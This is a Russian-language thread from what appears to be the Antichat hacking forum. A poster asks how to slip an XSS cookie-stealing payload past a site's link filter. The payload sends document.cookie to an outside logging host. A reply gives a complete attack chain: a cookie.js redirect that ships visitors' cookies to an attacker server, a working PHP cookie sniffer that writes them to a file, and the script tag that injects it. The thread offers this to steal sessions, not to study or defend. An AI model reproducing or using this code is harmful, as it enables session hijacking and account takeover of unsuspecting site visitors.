Форум АНТИЧАТ - Как обойти фильтр при вводе ссылки???

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Как обойти фильтр при вводе ссылки??? (https://forum.antichat.xyz/showthread.php?t=30932)

Как обойти фильтр при вводе ссылки???

Значица есть сайт на котором имеется XSS - дыра, но вот в чём загвоздка. Когда я вставляю код на алерт то окошко вылетает, но как только хочу внести данные о тех кто зайдёт на страничку в лог вот таким образом #<script>location.href="http://ccl.whiteacid.org/log.php?182292"+document.cookie</script># предварительно всё зашифровав фильтр меняет этот код так, чтобы по ссылке автоматически не переходилось #<script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script>#. Как с этим быть? :confused:

Создаем файл cookie.js и пишем в нем:

location.href='http://твой_сайт_с_php/sniffer.php' + document.cookie;

Создаем файл sniffer.php

Код:

<?php

$cookie = $_SERVER['QUERY_STRING'];

if($cookie)

{

$fp = fopen("cookies.txt", "a+");

fwrite($fp, "Original: ".$cookie."rn"."UrlDecoded: ".urldecode($cookie)."rnrn");

fclose($fp);

header("Location: fbi.gov");

}

?>

Это код простейшего сниффера. Их полно в сети.

Создаем файл cookies.txt и ставим права на запись.
(В доведенный до ума снифер обычно включают различные проверки и нет необходимости создавать другие файлы)

В итоге получаем строчку:

Код:

<script src=http://твой_сайт_с_php/cookie.js></script>